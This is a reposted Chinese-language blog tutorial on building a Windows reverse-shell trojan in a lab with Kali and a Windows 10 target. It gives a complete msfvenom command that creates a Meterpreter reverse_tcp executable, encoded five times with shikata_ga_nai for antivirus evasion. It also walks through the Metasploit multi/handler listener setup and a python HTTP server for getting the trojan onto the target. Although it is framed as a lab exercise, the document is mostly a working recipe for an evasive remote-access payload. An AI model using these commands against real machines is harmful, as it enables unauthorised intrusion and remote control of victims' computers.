0


反弹shell---生成木马反弹shell(Windows)

一、环境准备

使用到的机器:
系统IP地址描述kali192.168.230.128监控机Windows10192.168.230.131
靶机

使用到的工具:

MSF-Metasploit Framework(kali自带)

二、生成木马

使用到的命令:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.230.128  LPORT=4567  -e x86/shikata_ga_nai  -f exe -o  shell.exe  -i 5

命令解读:
-p添加载荷payload(选择与靶机相符的)LHOST监控机的IPLPORT监控机的端口-e编码免杀-f指定文件输出格式-o文件输出(即文件名)-i编码次数
注意:使用的端口一定是空闲端口,即未被使用的。

运行截图:

三、配置MSF监控

1.启动msf

终端中输入命令:msfconsole

2.载入监控模块

msf中输入命令:use exploit/multi/handler

3.加载payload

msf中输入命令:set payload windows/meterpreter/reverse_tcp

4.配置payload

msf中输入命令:show options

5.配置payload监控IP

msf中输入命令:set LHOST 192.168.230.128

6.配置payload监控端口

msf中输入命令:set LPORT 4567

7.再次查看payload配置

msf中输入命令:show options

8.执行监控

msf终端中输入:run

四、攻击利用

1.将木马上传到windows10靶机。

2.在靶机上执行木马。

3.在kali上查看,可以查看到windows10靶机的信息,成功实现反弹shell。

补充---一种上传到靶机的方法:

使用python,命令如下:

python2 -m SimpleHTTPServer 80
//注意80端口在未使用的情况下使用,80端口占用可以使用其他端口。

然后在靶机的浏览器中输入监控机的IP地址,如果端口不是80后面加上端口。

例如:192.168.230.128:端口

标签: 安全 web安全

本文转载自: https://blog.csdn.net/weixin_50956890/article/details/124571904
版权归原作者 RENSP丶超 所有, 如有侵权,请联系我们删除。

“反弹shell---生成木马反弹shell(Windows)”的评论:

还没有评论